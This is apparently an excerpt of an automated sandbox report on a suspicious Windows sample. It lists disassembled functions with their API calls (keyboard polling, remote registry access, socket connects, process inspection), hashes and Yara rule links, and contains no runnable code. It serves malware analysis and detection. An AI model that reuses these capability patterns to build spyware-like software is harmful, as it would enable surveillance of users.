Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: f8737f4667b6edcf0a82a42b1011058f24bf46090a1897447fc74a920b036299
Instruction ID: f0396ef95a81a5e5c227a9e9c7bc888ec8b0ca7d61da068663fc1234ad30c2f7
Opcode Fuzzy Hash: f8737f4667b6edcf0a82a42b1011058f24bf46090a1897447fc74a920b036299
Instruction Fuzzy Hash: 3C11A275500305BBCF11BF609CC5FE93B68AB54705F004066FE19AA182DB749589EB74

Function 00C81945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C819F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C81A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C81B49
CloseHandle.KERNEL32(?), ref: 00C81BBF

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 74c289eec811d8146b63b8ce96fcba1c7d1d37a30b448cc8ad8f059791edd004
Instruction ID: 8a9cd42983ce91159a4c9a03d7f6f0826cae99b7ddb5e1f8c1bd45fba73a350f
Opcode Fuzzy Hash: 74c289eec811d8146b63b8ce96fcba1c7d1d37a30b448cc8ad8f059791edd004
Instruction Fuzzy Hash: CB8164B0610214ABDF10AF64C886BADBBE9EF04724F188459FD15AF382D7B4AD41DF94

Function 00C61C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C61CB4
VariantClear.OLEAUT32(00000013), ref: 00C61D26
VariantClear.OLEAUT32(00000000), ref: 00C61D81
VariantClear.OLEAUT32(?), ref: 00C61DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C61E26

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: db2a79212e5d86a229f165557840c48f6ebe9c7638f0f9bd1c81e57466f05003
Instruction ID: 3a5366db26db578eb89bc19d4ea3335ad681a465056221ca031ff8340047c4f1
Opcode Fuzzy Hash: db2a79212e5d86a229f165557840c48f6ebe9c7638f0f9bd1c81e57466f05003
Instruction Fuzzy Hash: 4E515DB5A00209EFDB14CF58C884AAAB7B8FF4D315B198559ED59DB301D730EA51CFA0

Function 00C80688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00C806EE
GetProcAddress.KERNEL32(00000000,?), ref: 00C8077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00C8079B
GetProcAddress.KERNEL32(00000000,?), ref: 00C807E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 00C807FB

Part of subcall function 00C3E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00C6A574,?,?,00000000,00000008), ref: 00C3E675
Part of subcall function 00C3E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00C6A574,?,?,00000000,00000008), ref: 00C3E699

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 32bff55df1389e2e078d4403223a09bc98f8d9fd73a38aba759e94d0eaab4edd
Instruction ID: 05f3ae4903f85463d574e01b4e69bf0bedf22ac93f2fdf4a3eaa5aea03a3ffd4
Opcode Fuzzy Hash: 32bff55df1389e2e078d4403223a09bc98f8d9fd73a38aba759e94d0eaab4edd
Instruction Fuzzy Hash: EA516B75A00219DFCB00EFA8C481EADB7B5BF19314F148059EA16AB392DB30EE45DB94

Function 00C82E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C83C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C82BB5,?,?), ref: 00C83C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C82EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C82F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C82F75
RegCloseKey.ADVAPI32(?,?), ref: 00C82FA1
RegCloseKey.ADVAPI32(00000000), ref: 00C82FAE

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 2873935e571d924f72a3c6d5745666106f668897de0530395fc4b16f703535e3
Instruction ID: a955399a5e6b891e332f710726c21d2ca3d8a5ff4b60a52fb384b69ea66b9138
Opcode Fuzzy Hash: 2873935e571d924f72a3c6d5745666106f668897de0530395fc4b16f703535e3
Instruction Fuzzy Hash: DA515B71208204AFD704EF94C895E6EB7F9FF88708F00881DF69697291DB30E904DB56

Function 00C8CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e760ef5cbc42cd708219c5f483be077034552cb2d539d0f882eef7b469ad644
Instruction ID: 7edd92fbf5cfe739898f06b481506f68df2d7af70bd133c9843406711128d571
Opcode Fuzzy Hash: 2e760ef5cbc42cd708219c5f483be077034552cb2d539d0f882eef7b469ad644
Instruction Fuzzy Hash: F441A779900114AFD710FF68CCC4FA97F68EB09318F150166F96AA72D1C770AE51DB68

Function 00C71206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C712B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C712DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C7131C

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C71341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C71349

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 9aa5ea7608be1282044c6a8f69dc0ed3b2b41cff253bc96c402fd60978d1ff52
Instruction ID: 835a26ef4919115e92b23aa7fa29e608f3b5e1208f4c4b4b13736c962489b05f
Opcode Fuzzy Hash: 9aa5ea7608be1282044c6a8f69dc0ed3b2b41cff253bc96c402fd60978d1ff52
Instruction Fuzzy Hash: 0E412935A00215DFDF01EF64C981AAEBBF5FF08314B148099E91AAB762CB31ED41DB50

Function 00C3B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 00C3B64F
ScreenToClient.USER32(00000000,000000FF), ref: 00C3B66C
GetAsyncKeyState.USER32(00000001), ref: 00C3B691
GetAsyncKeyState.USER32(00000002), ref: 00C3B69F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 624a5817621dc955a087636c68c501a624e3ca912a98a99a7124a7552514bfa8
Instruction ID: 82e03a4bed272b2a25b542cc5a24dce36d6f6ddd3bc97f742320c955bc2de309
Opcode Fuzzy Hash: 624a5817621dc955a087636c68c501a624e3ca912a98a99a7124a7552514bfa8
Instruction Fuzzy Hash: E9417F35604119FBCF199F65C849AEDBB74FB05324F104319F82AA6291CB30AE94EFA1

Function 00C5B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C5B369
PostMessageW.USER32(?,00000201,00000001), ref: 00C5B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C5B41B
PostMessageW.USER32(?,00000202,00000000), ref: 00C5B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C5B431

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: f71c9faf8d4aba8d12177539cecfec37fd844fd2234485e4f36fa193573fa055
Instruction ID: a22c143a4770fa5c878f94b42f00bd4748072726a4af1da01864b2614b1efd54
Opcode Fuzzy Hash: f71c9faf8d4aba8d12177539cecfec37fd844fd2234485e4f36fa193573fa055
Instruction Fuzzy Hash: B931BF71900219EBDB14CF68D949B9E7FB5EB0531AF104229F922AB1D1C7B09E58DB90

Function 00C5DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C5DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C5DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C5DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C5DC52
_wcsstr.LIBCMT ref: 00C5DC5C

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 523127ef8153b31b43b1cc6d5f1793b32cf39095b3be32ff2ae168468c3c29a8
Instruction ID: 50c16d74ed70ddc224ee928f67e2deefa75b65239c5a65013f31436ed3c09415
Opcode Fuzzy Hash: 523127ef8153b31b43b1cc6d5f1793b32cf39095b3be32ff2ae168468c3c29a8
Instruction Fuzzy Hash: 52210775204200BBEB259F399C49E7F7BA8DF45751F144039FC0BCA191EAA1DD85E2A4

Function 00C5BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C5BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C5BCC2
__itow.LIBCMT ref: 00C5BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C5BD00
__itow.LIBCMT ref: 00C5BD11

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 1b49cde0d616ac225a3b7b9f09e8241059e94f4bc4cb02238a3bd0710537820d
Instruction ID: dc8c8d0e8774f0f7986b3fe210a8b882113cb9975cf8a4cd0bb87dd6fb7b6a95
Opcode Fuzzy Hash: 1b49cde0d616ac225a3b7b9f09e8241059e94f4bc4cb02238a3bd0710537820d
Instruction Fuzzy Hash: 3C21C639600218BADB10AF659C46FDF7E78EF4A711F000425FD16EB181EBB09D8997A9

Function 00C66318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00C250E6: _wcsncpy.LIBCMT ref: 00C250FA

GetFileAttributesW.KERNEL32(?,?,?,?,00C660C3), ref: 00C66369
GetLastError.KERNEL32(?,?,?,00C660C3), ref: 00C66374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00C660C3), ref: 00C66388
_wcsrchr.LIBCMT ref: 00C663AA

Part of subcall function 00C66318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00C660C3), ref: 00C663E0

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 5ccc4a9d26228147923b32747c9bfa912454fa276afa94edddefd5c76a622239
Instruction ID: 184ecb29f2a99166caad89249540d71215985b473e15e0483cb0fca7d85f7ceb
Opcode Fuzzy Hash: 5ccc4a9d26228147923b32747c9bfa912454fa276afa94edddefd5c76a622239
Instruction Fuzzy Hash: 822105319142159BDB31AB78AC82FEE33ACEF06360F10047AF016D72E0EB60DE819A55

Function 00C78B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00C7A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C78BD3
WSAGetLastError.WSOCK32(00000000), ref: 00C78BE2
connect.WSOCK32(00000000,?,00000010), ref: 00C78BFE

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: f9b8a771247edb13996b65b36935df29fa817c4948eeb9f08fd481132809ec25
Instruction ID: 44143d77ea0f1946386f64efa6d1b66fe66185af32b929e24c5e998349bfcaa2
Opcode Fuzzy Hash: f9b8a771247edb13996b65b36935df29fa817c4948eeb9f08fd481132809ec25
Instruction Fuzzy Hash: 5E21C0312002149FDB14AF68DC89B7E77A9EF49724F048449FA57EB2D2CF74AC058B62

Function 00C78420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C78441
GetForegroundWindow.USER32 ref: 00C78458
GetDC.USER32(00000000), ref: 00C78494
GetPixel.GDI32(00000000,?,00000003), ref: 00C784A0
ReleaseDC.USER32(00000000,00000003), ref: 00C784DB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: e0f657200afd0091487d31556429eb8d9165c9f9b7288a2c8d0a261f0903fe20
Instruction ID: 28f92907c8324154bbc7dd4fe9eb182b640bfb28f2d86e7d133e439e616e1145
Opcode Fuzzy Hash: e0f657200afd0091487d31556429eb8d9165c9f9b7288a2c8d0a261f0903fe20
Instruction Fuzzy Hash: D4219D75A00204AFDB00EFA4D888BAEBBE5EF49301F04C879F95BD7651CA70AC44DB60

Function 00C3AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C3AFE3
SelectObject.GDI32(?,00000000), ref: 00C3AFF2
BeginPath.GDI32(?), ref: 00C3B009
SelectObject.GDI32(?,00000000), ref: 00C3B033

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 21d8cc81d4e8a70b4f4ffffe0bec03fd0068c2d99282e8b24c8977e35add42ee
Instruction ID: 7b5d5e54bc17dc411dd9fb1ec3579e0f4bd9cff61d422a7838a9440e1bbfb913
Opcode Fuzzy Hash: 21d8cc81d4e8a70b4f4ffffe0bec03fd0068c2d99282e8b24c8977e35add42ee
Instruction Fuzzy Hash: 042180B0810385EFDB10DF95EC887AE7B6CFB15365F18431AF9269A1A0C3705AA1DF91

Function 00C4217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00C421A9
CreateThread.KERNEL32(?,?,00C422DF,00000000,?,?), ref: 00C421ED
GetLastError.KERNEL32 ref: 00C421F7
_free.LIBCMT ref: 00C42200
__dosmaperr.LIBCMT ref: 00C4220B

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 27a8fcd90173e3aa84436376626999691d2f5417ac2debf06a7a03d88410ca62
Instruction ID: 528a0790b123782fadde4d0614148b24af3894bcf4d2f40580136ab05aecde4f
Opcode Fuzzy Hash: 27a8fcd90173e3aa84436376626999691d2f5417ac2debf06a7a03d88410ca62
Instruction Fuzzy Hash: E6110433104346AF9B21AFA5DC42EAF3BA9FF01770B100529F92587191EBB1D901A7A1

Function 00C5ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C5ABD7
GetLastError.KERNEL32(?,00C5A69F,?,?,?), ref: 00C5ABE1
GetProcessHeap.KERNEL32(00000008,?,?,00C5A69F,?,?,?), ref: 00C5ABF0
HeapAlloc.KERNEL32(00000000,?,00C5A69F,?,?,?), ref: 00C5ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C5AC0E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: dc6c4c61ccab203476570fe88a6b75e867428e93bc81962a73ee1058cd93f1e1
Instruction ID: 20be4c89cc946c9caa4795ed7bab925ab30f4249e4fb106aeccf24610b4b8122
Opcode Fuzzy Hash: dc6c4c61ccab203476570fe88a6b75e867428e93bc81962a73ee1058cd93f1e1
Instruction Fuzzy Hash: 95013175201204BFDB104FA6DC48EAF3BADEF8A7597100529F957C3260D671DD84CB65

Function 00C59ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00C59ADC
